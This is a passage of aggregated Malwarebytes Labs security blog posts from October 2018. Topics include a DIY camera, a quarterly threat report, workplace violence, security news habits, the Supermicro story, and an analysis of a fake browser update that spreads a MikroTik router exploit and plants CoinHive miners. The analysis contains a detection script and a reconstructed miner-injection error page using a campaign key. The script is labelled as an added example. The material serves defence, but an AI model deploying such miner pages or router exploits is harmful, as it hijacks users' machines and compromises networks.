  • Even new hardware can be defective. I had a defective Raspberry Pi camera; it failed right out of the box. This forced me to do a lot of detective work and test all the hardware.
  • This wound up being quite a bit more expensive than an off-the-shelf commercial product. It was a great learning experience, though.
What’s left to do?

I need to build a good case for my Frankenstein security camera, because static electricity is a definite concern here. Exposed electronics are not a good thing. Also, security staff, should they actually visit your room, might be alarmed at seeing a hodgepodge of components and wires sitting on a desk.

There are several articles on the web describing how to build and deploy motionEyeOS on a Raspberry Pi. I always find that they never give you the full story. Failures, both in hardware and in software configuration, are an opportunity to learn.

The post How to build your own motion-activated security camera appeared first on Malwarebytes Labs.

Categories: Techie Feeds

A week in security (October 8 – 14)

Malwarebytes - Mon, 10/15/2018 - 15:56

Last week, we warned you away from some dubious Doctor Who streams, explained how Endpoint Detection and Response may not be enough, and explored what happens during a confusing supply chain story. We also showed you how to keep up with security, explained the risks of fake browser updates, and explored the unpleasant world of workplace violence.

Other cybersecurity news:

Stay safe, everyone!

The post A week in security (October 8 – 14) appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Malwarebytes Labs Cybercrime Tactics and Techniques Report (CTNT) shows shift to business targets in Q3

Malwarebytes - Mon, 10/15/2018 - 07:01

Once again, it’s that time of year: time for the quarterly Malwarebytes Labs Cybercrime Tactics and Techniques Report. Strap in your seat belts, folks, because the third quarter of 2018 was quite a wild ride.

After a sleepy first two quarters, cybercriminals shook out the cobwebs and revved up their engines in Q3 2018. With cryptominers and exploit kits maturing, ransomware ramping up with steady, sophisticated attacks, and banking Trojans experiencing a renaissance, we’re having one heck of a season. Attack vectors were at their most creative—and most difficult to remediate—especially for businesses.

In fact, businesses saw far more action this quarter than consumers: their total detections trended upwards by 55 percent, while consumer detections increased by only 4 percent quarter over quarter. It looks like threat actors are searching for more bang for their buck, and business targets are returning more value for their efforts. Banking Trojans and ransomware, traditionally aimed at both businesses and consumers, leaned much harder into their business targets this quarter. Even malware that has generally favored consumers, such as cryptominers and adware, seems to have graduated to more professional prey.

Consumers didn’t get away from Q3 unscathed, however. They saw a whole lot of scam action this quarter, especially the ever-classic sexploitation technique, but this time it came with a twist—scammers used stale personally identifiable information (PII) likely pulled from breaches of old to scare users into action. And although the bad guys were up to no good, we at Malwarebytes had a field day taking a bunch of them down.

So how did we draw our conclusions for this report? As we’ve done for the last several quarterly reports, we combined intel and statistics gathered from July through September 2018 from our Intelligence, Research, and Data Science teams with telemetry from both our consumer and business products, which are deployed on millions of machines.

If you want to learn more about the key developments in cybercrime last quarter, including the latest threats, newest attack methods, noteworthy scams, and predictions for Q4 cybercrime trends, check out the full Malwarebytes Labs Cybercrime Tactics and Techniques Report.

The post Malwarebytes Labs Cybercrime Tactics and Techniques Report (CTNT) shows shift to business targets in Q3 appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Workplace violence: the forgotten insider threat

Malwarebytes - Fri, 10/12/2018 - 16:00

Organizations are no stranger to insider threats. In fact, for those who have been around since long before the Internet, workplace violence (alongside spying) is a problem many businesses have seen before and sought to address.

However, the adoption and use of the Internet completely changed the way organizations run and grow their businesses, how customers can communicate with companies, and how employees do their jobs. And with this advancement—as we’re well aware by now—comes new, more sophisticated challenges that can compound the risks that organizations face from insiders.

When it comes to security, many enterprises are focused on beefing up their system and network defenses to keep outside hackers from getting their hands on digital assets. In addition, organizations are now more aware of the threat that malicious insiders pose—whether that’s stealing proprietary information or spying for competitors. Yet it seems that little or no attention is given to addressing workplace violence as a whole.

An overview of workplace violence

In our previous blog on insider threats, we defined workplace violence (WPV) as “violence or threat of violence against employees and/or themselves.” This can manifest in the form of physical attacks, threatening or intimidating behavior and speech (written, verbal, or electronically transmitted), harassment, property damage, or other acts that could put people at risk.

Early signs of potential for violence include threats of bodily harm (often framed as a joke, a passing comment, or a verbalization of violent thoughts), insults, passive-aggressive actions, dramatic or unreasonable demands, withdrawal (especially if they used to be sociable), and sudden undue whining or complaining. Other manifestations may not be evident at first, too.

Knowing this, one might think it is essential for organizations of any size to be able to identify and tackle workplace violence head on, on top of improving their network defenses. Sadly, this isn’t the case.

Although organizations are required by law to keep employees safe by creating a healthy, hazard-free workplace environment, almost half of executives in a corporate survey conducted by TAL Global, a security and risk management company, believe that “workplace violence is not an issue that needs to be addressed.” It’s also frustrating to note that more than half of these executives “do not believe that workplace violence will create a negative impact on their budget.”

This is a serious oversight, especially when the Department of Justice estimates that workplace violence costs US businesses about $36 billion per year in lost productivity, property, and most importantly, employee lives.

The workplace, redefined

While we’re on the subject of WPV, it’s important to remind ourselves that the definition of “workplace” has evolved over time and is no longer confined within the walls of a traditional office building. Today, the workplace can be your home, your favorite coffee shop, the local library, or even a co-working space.

Over the last decade, the number of telecommuting workers has increased by 115 percent, according to a 2017 report from Global Workplace Analytics and FlexJobs. And while working from home is beneficial for both employees and employers, it also comes with its own risks.

While organizations must be sure to protect their sensitive client and company data accessed outside of the office network by remote workers, they also have to ensure workplace security in the telecommuter’s home office.

Why? Because a home office, according to the Occupational Safety and Health Administration, is still under the employer’s jurisdiction. Therefore, they must make sure that home offices are safe and hazard-free. This could also mean that policies governing workplace violence could be adapted from the office to the home office.

Is workplace violence on the rise?

Perhaps. The TL;DR answer to that question is this: It depends on the industry (e.g., incidents of workplace violence in healthcare are far more common than in other industries) or the type of violent incident (e.g., non-fatal assaults have decreased while workplace homicides have increased).

Regardless of whether WPV has decreased or increased, it’s clear that the issue needs addressing. The promotion and adherence to the “It wouldn’t happen to us!” myth didn’t save organizations from hackers breaching their systems, so why should it keep them from WPV incidents?

Read: 5 cybersecurity questions retailers must ask to protect their businesses

Types of WPV

Talking about workplace violence may conjure up highly-publicized images of active shooters stationed on campus. Let us keep in mind, however, that not all workplace violence events happen this way. According to Steve Crimando, an expert in the field of threat assessment and threat management, there are five current types we all need to familiarize ourselves with. They are:

  • Criminal intent. This type usually involves criminals who target establishments, often, with the intent to steal. Robbers and shoplifters belong to this type.
  • Customer/Client. This type is perpetrated by customers or patients (including their relatives) against one or more workers servicing them. Verbal abuse against workers in healthcare and social services is an example.
  • Worker-to-worker. This is probably the type employees can relate to the most. These acts of violence can be perpetrated by either current or former employees toward one or more other employees of an organization. Workplace bullying is an example of this type.
  • Domestic violence. More commonly, women have been victims of domestic violence in the workplace, but that isn’t to say that this doesn’t happen to men.
  • Ideological violence. This type could either be perpetrated by radicalized employees or external actors targeting organizations, its people, and properties for reasons related to their ideology, politics, or religion. Active shootings and terrorist attacks are examples that fall under this type.

Some organizations only partially recognize stalking and cyberbullying as workplace violence, but we’d consider them to be as well.

Practical ways organizations can help address WPV

Marianne Alvarez, co-founder and director of training at the ALICE (Alert, Lockdown, Inform, Counter, Evaluate) Training Institute in California, has provided tips on how organizations can prepare themselves for potential incidents of workplace violence. Her recommendations include:


  • Check the overall health of the organization’s safety and physical security. This may involve hiring a certified risk assessment professional who can conduct a full onsite evaluation of security gaps or weaknesses the business may have to address. The risk assessment professional inspects infrastructure weaknesses (locks, CCTV cameras, etc.) as well as the prevention and training programs that are in place, to see whether these need to be enhanced.
  • Once the risks and weaknesses are identified, prioritize which ones to address first. During the prioritization phase, also set a plan and a budget.
  • Continue training (or in some cases, re-training) employees on how to respond to incidents of workplace violence, whether it be a full-blown shouting match between two workers or an incident involving aggressive intruders.

It’s imperative that companies stress the importance of preventing the escalation of a negative encounter in the workplace to an active shooting event.

“The training should include a blended model of classroom-type learning, a test to ensure learning, and drills to practice what they learned,” said Alvarez. “Much like CPR, one must be able to apply the appropriate concepts while under the pressure of a critical event. The only way to ensure this is to repeat the practice of the concepts in live drills.”

When work life bleeds into personal life

Modern-day workers have come to perceive and accept their work lives as something inseparable from their personal lives. It’s a mindset and lifestyle prevalent to those working in tech industry hotspots like Silicon Valley, as well as financial hubs such as Wall Street. So feeling like a failure in work could make one feel like a failure in life.

“An employee can feel that they give their all to a company, making employment feel like less of a job and more a way of life,” said Leslie Garcia, CEO of Executech Security Solutions. “When not recognized for their efforts or terminated for poor work performance, this could possibly trigger a retaliatory emotional and potentially dangerous physical response.”

It’s vital to address vulnerabilities in systems that endanger valuable data. However, it is equally important to take care of the people under organizations’ watch. Ideally, an overall workplace security posture—that which covers the protection and safety of the business’s infrastructure, tangible assets, digital assets, and its people—coupled with a culture that intentionally ingrains security behaviors, awareness, and proper reporting practices—would be able to mitigate workplace violence as well.

In the face of workplace violence, these are thoughts organizations must ponder, recognize, accept, and take action on. The lives of their employees depend on it.

Recommended reading:

The post Workplace violence: the forgotten insider threat appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Fake browser update seeks to compromise more MikroTik routers

Malwarebytes - Fri, 10/12/2018 - 15:00

This blog post was authored by @hasherezade and Jérôme Segura.

MikroTik, a Latvian company that makes routers and ISP wireless systems, has been dealing with several vulnerabilities affecting its products’ operating system over the past few months. Ever since a critical flaw in RouterOS was identified in late April 2018, attacks have been going on at an alarming rate, made worse when a newly-found exploitation technique for CVE-2018-14847 was identified.

Part of the problem is that a large number of MikroTik routers remain unpatched and are prey for automated attacks, despite security fixes made available by the vendor. Criminals were quick to leverage proof-of-concept code to compromise hundreds of thousands of devices in a short time frame. Last summer, researchers at SpiderLabs discovered what was perhaps the biggest malicious Coinhive campaign via hacked MikroTik devices, which has since evolved into a much wider problem.

With this latest trick, users behind compromised routers are served a fake browser update page. When they run this malicious update, it unpacks code onto their computer that scans the Internet for other vulnerable routers and tries to exploit them.

Suspicious browser update

Security researcher @VriesHd first spotted a new campaign attempting to further compromise vulnerable routers using a typical social engineering technique. Internet providers that operate infected MikroTik routers will serve this malicious redirect about an “old version of the browser” to their end users:

According to a search via Censys, there are about 11,000 compromised MikroTik devices hosting this fake download page:

The alleged browser update is suspiciously downloaded from an FTP server, as seen below:

Interestingly, this IP address is also listed as a free and open web proxy. Proxies are often used by those who wish to bypass certain country limitations (i.e. watching the American version of Netflix if you are not in the US) or simply as a way to mask their IP address.

Payload analysis

Behavioral analysis

The payload follows the theme of pretending to be an installer named upd_browser.

When we deploy it, it pops up an error:

However, if we capture the network traffic, we can see that in the background it scans various IP addresses, trying to connect on port 8291 (the default port for managing MikroTik routers via the Winbox application):


The dropped payload is a relatively big executable (7.25 MB) with a huge overlay. The sections’ headers and their visualizations are given below:

As we can recognize by looking at the section names, it comes packed by a popular, simple packer: UPX. The size of the overlay suggests that there is something more to be extracted. After further examination, we find that it unpacks a Python DLL and other related files into the %TEMP% folder and then loads them. At this point, it is easy to guess that this EXE is in reality a wrapped Python script. We can unpack it following the same procedure as the one described here.

The Entry Point is in the script named upd_browser. After decompiling and following the scripts, we find out that the malware’s core consists of two Python scripts: and

Inside the scripts

The main function of the module is pretty simple:

As we can see, the error pop-up is hardcoded: It does not alert about any actual error, but is used as a decoy.

After that, the malware logs the IP address of the victim by querying a hardcoded address of a tracker made using a legitimate service, IP Logger. The tracker takes the form of a one pixel–sized image:

Later, this address is queried repeatedly in a defined time interval.

The most important actions are performed in the function named “scan” that is deployed in several parallel threads (the maximum number of threads is defined as thmax = 600). The function “scan” generates pseudo-random IP addresses and tries to connect to each of them on the aforementioned port 8291. When the attempt of connecting is successful, it tries another connection, this time on a random port from a range of 56778 to 56887. When this one fails, it proceeds with the exploitation:

The function “poc” is meant to infect the router using known vulnerabilities. It starts by attempting to retrieve credentials leveraging the path traversal vulnerability (CVE-2018-14847):

The user.dat file is expected to be in M2 format, so the script comes with a built-in parser (function load_file):

If retrieving the password from the user.dat file is successful, it decodes the credentials and uses them to create a backdoor: an account with a randomly-generated password. It also sets a scheduled task to be executed by the router.

The script that is set in the scheduler is generated from a hardcoded template (cleaned version available here). Its role is to manipulate the router’s settings and set up an error page loading a CoinHive miner.

The error page can be dropped in two locations: “webproxy/error.html” or “flash/webproxy/error.html” .

Such a page is displayed to users whenever they try to view a URL to which access is denied. But the malicious script configures the router so that basically any HTTP request leads to the error page. Yet the error page is crafted to spoof the original traffic, displaying the requested page in an iframe, so users can browse most of the web as usual without noticing the change. Example:

The CoinHive miner is embedded in that page, so for as long as they browse, their machines are used for mining.
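Two of the behaviors described above are observable from the defender’s side without touching the malware: the scan threads fan out connections to TCP/8291 across many unrelated addresses from a single infected PC, and the router’s error page loads CoinHive with one of the site keys listed under the indicators of compromise. The script below is an added example, not code from the Malwarebytes post or from the malware. Its connection-log lines and error page are constructed, the log format (timestamp, source, destination, destination port) and the detection thresholds are my assumptions, and the site keys are copied from the IoC list further down.

```python
"""Added example; not code from the post or the malware. Two defender-side
checks built from the behaviour described in the analysis:
  detect_scanners()    - a host fanning out to TCP/8291 (Winbox) on many
                         distinct addresses, plus follow-up probes in the
                         56778-56887 range, as the "scan" threads do;
  find_coinhive_keys() - an HTTP body loading CoinHive with one of the
                         site keys from the indicators of compromise.
Log lines, thresholds, the log format and the HTML are constructed/assumed."""
import re
from collections import defaultdict

WINBOX_PORT = 8291
PROBE_PORTS = range(56778, 56888)   # 56778-56887, the range from the post

# Site keys from the post's IoC list.
COINHIVE_KEYS = {
    "oiKAGEslcNfjfgxTMrxKGMJvh436ypIM", "5zHUikiwJT4MLzQ9PLbU11gEz8TLCcYx",
    "5ROof564mEBQsYzCqee0M2LplLBEApCv", "qKoXV8jXlcUaIt0LGcMJIHw7yLJEyyVO",
    "ZsyeL0FvutbhhdLTVEYe3WOnyd3BU1fK", "ByMzv397Mzjcm4Tvr3dOzD6toK0LOqgf",
    "joy1MQSiGgGHos78FarfEGIuM5Ig7l8h", "ryZ1Dl4QYuDlQBMchMFviBXPL1E1bbGs",
    "jh0GD0ZETDOfypDbwjTNWXWIuvUlwtsF", "BcdFFhSoV7WkHiz9nLmIbHgil0BHI0Ma",
}
KEY_RE = re.compile(r"CoinHive\.Anonymous\(\s*['\"]([A-Za-z0-9]{32})['\"]")


def build_sample_log():
    """Constructed traffic: one benign client (a single Winbox connection is
    normal for an admin) and one host behaving like the scanner: 30
    pseudo-random targets on 8291 within 30 s, then a probe in the
    56778-56887 range against one of them."""
    lines = ["1539340000 10.0.0.5 203.0.113.10 443",
             "1539340002 10.0.0.5 203.0.113.11 80",
             "1539340003 10.0.0.5 203.0.113.12 8291"]
    t0 = 1539340010
    for i in range(30):
        lines.append(f"{t0 + i} 10.0.0.7 198.51.100.{i + 1} {WINBOX_PORT}")
    lines.append(f"{t0 + 31} 10.0.0.7 198.51.100.4 56800")
    return "\n".join(lines)


def detect_scanners(log_text, min_targets=20, window=60):
    """Return {src: {"targets": n, "followup_probes": k}} for each source that
    reached at least min_targets distinct hosts on 8291 within `window` s.
    Thresholds are assumptions; tune them to your own baseline."""
    attempts = defaultdict(list)   # src -> [(ts, dst)] on port 8291
    probes = defaultdict(int)      # src -> connections into PROBE_PORTS
    for line in log_text.splitlines():
        ts, src, dst, dport = line.split()
        ts, dport = int(ts), int(dport)
        if dport == WINBOX_PORT:
            attempts[src].append((ts, dst))
        elif dport in PROBE_PORTS:
            probes[src] += 1
    hits = {}
    for src, conns in attempts.items():
        conns.sort()
        best, lo = 0, 0
        for hi in range(len(conns)):          # sliding time window
            while conns[hi][0] - conns[lo][0] > window:
                lo += 1
            best = max(best, len({dst for _, dst in conns[lo:hi + 1]}))
        if best >= min_targets:
            hits[src] = {"targets": best, "followup_probes": probes[src]}
    return hits


# Constructed stand-in for the injected error page: the requested site is
# shown in an iframe while the miner runs underneath it.
SAMPLE_ERROR_PAGE = """<html><body style="margin:0">
<iframe src="http://example.com/" style="width:100%;height:100%;border:0"></iframe>
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>
  var miner = new CoinHive.Anonymous('oiKAGEslcNfjfgxTMrxKGMJvh436ypIM', {throttle: 0.3});
  miner.start();
</script>
</body></html>"""


def find_coinhive_keys(html, known=COINHIVE_KEYS):
    """Return the CoinHive site keys in `html` that appear in the IoC list."""
    return [k for k in KEY_RE.findall(html) if k in known]


if __name__ == "__main__":
    print(detect_scanners(build_sample_log()))
    print(find_coinhive_keys(SAMPLE_ERROR_PAGE))
```

On a real network, feed detect_scanners() flow records (firewall, NetFlow or Zeek conn.log reduced to the four fields above); a workstation that suddenly opens hundreds of outbound 8291 connections is the infected “browser update” victim, and the follow-up probe count tells you the scanner found something that answered. find_coinhive_keys() is meant for an error.html pulled from a suspect router or for any proxied response body captured on the wire.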


MikroTik users are urged to patch their routers as soon as possible and should assume that their authentication credentials have been compromised if they are running an outdated version. MikroTik’s download page explains how to perform an upgrade to RouterOS.

Awareness that these vulnerabilities exist and are easy to exploit is important considering that patching a router is not something many people are used to doing. However, in many cases users will not be able to do so unless their Internet Service Provider does it for them upstream.

With this latest social engineering scheme, we saw how criminals try to infect regular users and leverage their computers to scan the Internet for vulnerable routers. The technique is effective because Internet-wide scanning takes time and resources, and the infected machines provide both.

Malwarebytes business customers and Premium consumer users are protected from this threat, as our anti-malware engine detects and blocks this fake browser update in real time:

Malwarebytes Endpoint Protection blocks the malicious executable disguised as a browser update.

Indicators of compromise

Sample hash


Coinhive site keys

oiKAGEslcNfjfgxTMrxKGMJvh436ypIM
5zHUikiwJT4MLzQ9PLbU11gEz8TLCcYx
5ROof564mEBQsYzCqee0M2LplLBEApCv
qKoXV8jXlcUaIt0LGcMJIHw7yLJEyyVO
ZsyeL0FvutbhhdLTVEYe3WOnyd3BU1fK
ByMzv397Mzjcm4Tvr3dOzD6toK0LOqgf
joy1MQSiGgGHos78FarfEGIuM5Ig7l8h
ryZ1Dl4QYuDlQBMchMFviBXPL1E1bbGs
jh0GD0ZETDOfypDbwjTNWXWIuvUlwtsF
BcdFFhSoV7WkHiz9nLmIbHgil0BHI0Ma

The post Fake browser update seeks to compromise more MikroTik routers appeared first on Malwarebytes Labs.

Categories: Techie Feeds

6 ways to keep up with cybersecurity without going crazy

Malwarebytes - Thu, 10/11/2018 - 15:00

As we dive headfirst into National Cybersecurity Awareness Month, it seems only fitting to discuss ways to stay on top of developments in modern cybersecurity and privacy. What’s the best way to stay protected? How can you determine if something is a scam? Which big company has been breached now?

The topic of security features heavily across many industries, blogs, and news channels simply because of the current state of affairs. It seems like every day we hear about a new major data breach, affecting thousands—if not millions—of people. From retailers like Target to social media sites such as Facebook to more prominent credit agencies like Equifax—no one is safe.

The uncontrolled nature of attacks coupled with the 24/7 news cycle make it downright overwhelming to keep up with all the cybersecurity information lobbed at us. The widespread release of new attacks, data breaches, systems failures, and malware use have led many to a feeling of security fatigue. We’re essentially all at a point where we’re sick and tired of hearing about it, and frankly disappointed in many companies and individuals who continually fail to protect the data they are responsible for.

Fatigue or not, we shouldn’t collectively ignore what’s happening in the world of cybersecurity right now. We all have a duty to not only protect ourselves, but also our communities, countries, and world over by staying in the know. You can contribute by keeping your knowledge up-to-date and employing a few simple strategies to capture the good information out there and weed out the bad.

1. Follow security professionals and influencers

We live in the information age, where knowledge is digital, recorded and streamed for posterity, stored in giant servers, and available at the entry of a search term. You can acquire new information and expand your knowledge in a variety of ways, according to your preferred methods.

For example, you can glean information from more traditional sources such as news websites and blogs from security experts, but you can also turn to social media, attend webinars and conferences, or communicate directly with someone well-versed in the field.

You could even bring it up at the office water cooler or while making small talk with parents at your child’s school; cybersecurity is covered so much in the media now that it’s become fodder for mainstream chatter. Many will happily discuss more than just the latest breach, possibly drawing up a debate on which security solution is the best or offering up ways in which you can protect yourself from attack.

Whatever you choose, you’ll want to follow some of the top security professionals for the best guidance. Some of my favorites include:

2. Browse security-related social media topics

Most social media networks are great resources for digging up additional content, such as news stories (real ones), videos, opinions, and other posts. In addition, they’re home to a treasure trove of supplemental information on local, national, and global events, career opportunities, top cybersecurity businesses, and more. Of course, social media is not the only place you’ll want to acquire information from, but it can serve as a complement to some of the other channels on this list.

Twitter is especially useful if you know which trends and hashtags to search, as well as who to follow. It allows you to see discussions about current events in real time so you can be right there, in the moment, when things play out.

Twitter lists are also great for creating a niche content feed. You can specify which security vendors, influencers, and developers you’d like to be in your list (or lists), and filter Tweets accordingly. Lists have the added benefit of weeding out noise not pertinent to a particular group—you can focus on a single topic or community.

3. Attend live events

Believe it or not, there’s a huge market for live, in-person cybersecurity events. This includes so much more than conferences, or “cons.” You might also attend lectures, discussions, workshops, networking events, educational courses, or sponsored meet ups.

Web-based events present another great avenue, such as webinars and online community conference calls. Some of the best live cybersecurity speakers will attend such events or be asked to participate, and it stands to reason you can learn a lot from any one of them.

So how do you find such events? You have to keep a pulse on when, where, and what’s happening around you. Local newspapers are great resources for event listings. And of course, there’s always trusty-old Google. Luckily, some of the other channels mentioned in this article will also help keep you informed.

4. Check vulnerability and risk advisory feeds

One cannot overstate the need to remain aware of security vulnerabilities discovered in both new and old technologies—especially for business owners. Web browsers, apps, software, operating systems, and a variety of the personal or professional tools you use may have been compromised or attacked.

You should make a habit of checking vulnerability alert feeds and advisory sites to ensure the protection of your personal and corporate data. Here’s a quick list:

If regularly checking these feeds feels overwhelming, another approach is simply to keep your programs updated at all times, which closes known vulnerabilities before a cybercriminal can exploit them to gain access to your machine.

5. Listen to a podcast

We all lead busy lives—maybe you don’t have time to read article after article. But what about the time you spend driving, walking, or traveling? Podcasts fill this time nicely, as you can listen to them on-the-go and multi-task while doing so.

Podcasts can be found—and listened to—through a variety of channels, including media apps, music libraries such as iTunes or Spotify, Amazon, or even YouTube.

6. Customize your own real-time alerts

Using a tool such as IFTTT—which stands for If This Then That—you can set up customized alerts for all things cybersecurity.

The subreddit r/netsec, for example, is one of the most popular curated forums for cybersecurity news and information. You can configure IFTTT so it sends you push notifications or emails when something gains popularity on the subreddit. The headlines will populate in the taskbar of your mobile device allowing you to gauge whether or not the story is worth your time.

The r/netsec example is just one of many, of course. You can configure any trusted sites or community forums to send you alerts via RSS feed as you see fit.

Just keep consuming

If you want to stay as close to the bleeding edge of cybersecurity as you can, continue to consume content, whether that’s by reading, listening, talking, watching videos, or attending live events. Understand that as you learn, the industry will continue to evolve, so staying on top of cybersecurity developments means adapting to an ever-shifting landscape. It’s unfortunately not enough anymore to glance at one article and call it a day.

While you understandably won’t have the time or inclination to invest every waking hour in your cybersecurity pursuits, you can certainly remain in-the-know without losing your mind by carefully curating and streamlining online information, and turning to sources you trust. There are plenty of ways to make yourself crazy. Learning more about cybersecurity shouldn’t be one of them.

The post 6 ways to keep up with cybersecurity without going crazy appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Bloomberg blunder highlights supply chain risks

Malwarebytes - Wed, 10/10/2018 - 16:00

Ooh boy! Talk about a back-and-forth, he said, she said story!

No, we’re not talking about that Supreme Court nomination. Rather, we’re talking about Supermicro. Supermicro manufactures the type of computer hardware that is used by technology behemoths like Amazon and Apple, as well as government operations such as the Department of Defense and CIA facilities. And it was recently reported by Bloomberg that Chinese spies were able to infiltrate nearly 30 US companies by compromising Supermicro—and therefore our country’s technology supply chain.

If you’ve been trying to follow the story, it may feel a bit like this:

What do we know so far

On October 4, Bloomberg Businessweek detailed a narrative regarding Chinese government influence into the operations of US-based hardware manufacturer Super Micro Computer, Inc., or simply Supermicro. The article was produced using information from 17 different anonymous sources including “one from a Chinese foreign ministry,” and draws on research spanning more than three years of investigations.

The article alleges that operatives from a unit of the People’s Liberation Army used a method known as seeding to compromise the Supermicro supply chain. They did this by coercing Chinese-based subcontractors responsible for the creation of the hardware circuitry to secretly install a high-tech spying chip into the motherboards and systems of computers destined for high-profile customers.

Bloomberg suggests the access gained by top-level operatives allowed the Chinese government to conduct a highly-targeted and highly-complex spying operation against organizations worldwide and across all sectors, including finance, health, government, and private industry.

That little chip is what the Bloomberg article says is responsible.

According to the article, the problem stems from a tiny microchip, no bigger than a pencil tip, that had been embedded in the electronic circuitry of compromised devices. Though the intent of the microchip remains uncertain, the article suggests it was capable of communicating with anonymous computers on the Internet and loading new code into the device operating system.

In at least one case, the malicious microchips are alleged to be thin enough to be embedded between the layers of fiberglass onto which the other components were attached.

The malicious microchip can be embedded between layers of hardware fiberglass.

The chips are said to be able to modify the instructions passing between the operating system and the CPU, allowing for code injection or other data-alteration techniques. The code has also created a stealth doorway into the networks of altered machines.

Or as Bloomberg put it:

The implants on Supermicro hardware manipulated the core operating instructions that tell the server what to do as data move across a motherboard. This happened at a crucial moment, as small bits of the operating system were being stored in the board’s temporary memory en route to the server’s central processor, the CPU. The implant was placed on the board in a way that allowed it to effectively edit this information queue, injecting its own code or altering the order of the instructions the CPU was meant to follow. Deviously small changes could create disastrous effects.

Talk about some deep-state, James Bond–level stuff.

Here, we have a story detailing illicit government operations and covert operatives who have systematically compromised the supply chain of one of the world’s largest motherboard and custom hardware manufacturers. Threat actors have accomplished this using a deeply-technical, highly-targeted—not to mention nearly impossible to detect—hardware attack utilizing incredibly small, sophisticated microchips that are embedded between the individual hardware fiberglass layers.

And why did they do it? To initiate clandestine spying operations against some of the world’s largest entities in order to exfiltrate sensitive intellectual property and top-secret government information.

Quick, call a Hollywood director. I have a story to pitch!

This is indeed a fantastic story filled with all sorts of nail-biting suspense and adventure, but just like any good Hollywood caper, we have to ask ourselves: Is there any truth to it? We imagine that when storytellers got a whiff of this tale, they did something like this:

Did that really happen?

One problem with verifying this story is that this type of attack isn’t detectable by any security solution. Right now, no one can detect hardware-level modifications using custom hardware solutions that have been systematically installed at the manufacturer level. That kind of detection protocol just doesn’t exist yet.

Another problem: Aside from SOC-generated network logs pointing fingers at compromised machines and vulnerable networks—of which the article said there were none—no one can prove or disprove this story.

Few security researchers are going to have access to the $100,000+ computers where these chips are said to reside. And even fewer of those researchers work for organizations that will let them start analyzing and ripping capacitor-looking circuits from the board. So basically, we’re left having to trust the anonymous sources used for the report.

This state of unknown even led well-known Google security researcher Tavis Ormandy to liken the event to the chemtrails conspiracy theory and the hunt for Sasquatch.

In the days since Bloomberg’s publication of the story, there have been significant rebukes and outright denials from the companies and government agencies cited in the report. Here’s what’s been said:

  • Amazon called the information untrue and doubled down on the statement by saying it was also untrue it had worked with or provided information to the FBI regarding malicious hardware.
  • Apple said they had repeatedly and consistently refuted every aspect of Bloomberg’s story during pre-publication verification efforts, and refute virtually every aspect of the article now.
  • Supermicro denied most, if not all, aspects of the Bloomberg story.
  • China’s Ministry of Foreign Affairs indicated the government intrusion into the product supply chain would violate China’s commitment to the proposal of the 2011 International Code of Conduct for Information Security.
  • And the United States Department of Homeland Security said it had no reason to question denials by US technology companies (though this doesn’t really refute the claims).

To further muddle the information, the only two named technology experts have backpedaled their statements since publication.

Joe Grand, cited hardware hacker and founder of Grand Idea Studio, Inc., claimed in a recent Twitter post that his quote was given over a year ago and related only broadly to the story as ultimately published.

In a fascinating podcast, Joe Fitzpatrick, founder of Hardware Security Resources, expressed concerns regarding the accuracy of the reporting, and claims his statements were taken out of context. In an email exchange provided by Fitzpatrick and read aloud on the podcast, Fitzpatrick expresses skepticism to Bloomberg reporters over the financial cost and scalability of the device.

“The whole setup doesn’t really make sense,” the email is quoted as saying. “It just doesn’t make sense to spend the time and money to do what you are describing. Are you sure that the person who did the analysis had actual hardware knowledge and understanding?” Fitzpatrick concludes, “I’m incredibly skeptical.”

So basically, all of the reporting on this story fell apart post-publication, and everyone involved has denied the aspects of the story. Oops!

Supply chain attacks are real

Even though Bloomberg may (or may not) have got the details wrong on this one, the scenario the story brings up is entirely plausible—though maybe not with the sensationalism portrayed in the article. In fact, supply chain compromises, hardware faults, and outright counterfeits are not at all uncommon. There have been numerous events across the globe that highlight the dangers that audit-free software and single points of failure can introduce.

Just last year, the popular Ukrainian tax software Medoc was subject to a compromised update that went out automatically to millions of customers. The attack resulted in the distribution of the EternalPetya ransomware.

Earlier this year, the popular PC cleaner CCleaner was the victim of an advanced APT backdoor that came as part of a software supply chain attack. In this multi-pronged attack, threat actors infected 2.27 million users in the first stage. After analyzing the collected information for high-value targets, only 40 were chosen for second-stage attacks and additional espionage efforts. This type of concentrated effort shows the lengths attackers are willing to go to in order to infect high-value and potentially lucrative industries and organizations.

Let’s also not forget that Edward Snowden detailed an NSA program that alleged backdoors planted in Cisco products allowed for spying on 20 billion communications each day—or the allegations that the NSA compromised hard drive manufacturers from all over the world to install malware that remained undetected for as long as two decades. Or how Mark Klein detailed secret, unmarked rooms at AT&T from which covert spying operations were being run.

And this doesn’t even touch on the countless vulnerabilities, IoT botnets, default password attacks, or the many other vectors that can be used to launch malware toward systems, peripherals, routers, and other hardware devices we use on a daily basis.

Unfortunately, few of these devices or systems are covered by security solutions that can protect from or remediate the unwanted code and malicious behaviors.

But don’t be fooled. This doom and gloom isn’t just isolated to high-tech computer components and state-sponsored spying. Nor is the problem isolated to components originating from specific geographic regions.

Due to deep supply chains and razor-thin profit margins, consumers face risks every day when at the checkout counter. Consumables can be compromised, either knowingly or not, and with malicious intent or not, in any one of the many downstream transports. This relates to everything from cheap computers and phones purchased from third-party markets all the way down to pet food and lettuce that you buy from your local supermarket. Even the vehicle you drive may have faults attributable to supply-chain issues.

There have been millions of instances where food, phones, computers, manufacturing goods, and virtually every other product known to man have shipped with vulnerabilities or been susceptible to supply-chain tampering.

So what do we do?

Admittedly, that’s a tough nut to crack.

Few in the security industry possess the necessary skills to comprehend—let alone reverse engineer—malicious hardware components that are deliberately designed to look like obscure, legitimate hardware components and are hidden within pin-point modules. And do any of us have the time or desire to understand the inner workings of the devices and systems we purchase? Okay, perhaps a few do.

To make matters worse, there aren’t any security products on the market that have the capability to protect against the sort of sophisticated and targeted attack outlined in the Bloomberg report. To steal a quote from the article: “This stuff is at the cutting edge of the cutting edge, and there is no easy technological solution.”

Regardless of the device or the origin of the product, businesses and consumers alike need to perform due diligence when purchasing devices and products. The risk tolerance may need to be assessed to determine if a particular service or product is worth the potential detriment of losing sensitive information—or other valuable data, time, and peace of mind.

